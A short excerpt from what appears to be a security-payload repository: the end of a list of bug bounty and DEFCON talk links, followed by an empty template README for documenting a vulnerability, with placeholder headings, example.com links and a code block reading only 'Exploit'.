26 | - [BSidesSF 101 The Tales of a Bug Bounty Hunter - Arne Swinnen](https://www.youtube.com/watch?v=dsekKYNLBbc)
27 | - [Security Fest 2016 The Secret life of a Bug Bounty Hunter - Frans Rosén](https://www.youtube.com/watch?v=KDo68Laayh8)
28 | - [The Conscience of a Hacker](https://www.youtube.com/watch?v=0tEnnvZbYek)
29 | - [Defcon 2020 Talks](https://www.youtube.com/user/DEFCONConference/videos)
30 | 


--------------------------------------------------------------------------------
/_template_vuln/README.md:
--------------------------------------------------------------------------------
 1 | # Vulnerability Title
 2 | 
 3 | > Vulnerability description - reference
 4 | 
 5 | ## Summary
 6 | 
 7 | - [Tools](#tools)
 8 | * [Something](#something)
 9 |   * [Subentry 1](#sub1)
10 |   * [Subentry 2](#sub2)
11 | 
12 | ## Tools
13 | 
14 | - [Tool 1](https://example.com)
15 | - [Tool 2](https://example.com)
16 | 
17 | ## Something
18 | 
19 | Quick explanation
20 | 
21 | ```powershell
22 | Exploit
23 | ```
24 | 
25 | ## References
26 | 
27 | - [Blog title - Author, Date](https://example.com)


--------------------------------------------------------------------------------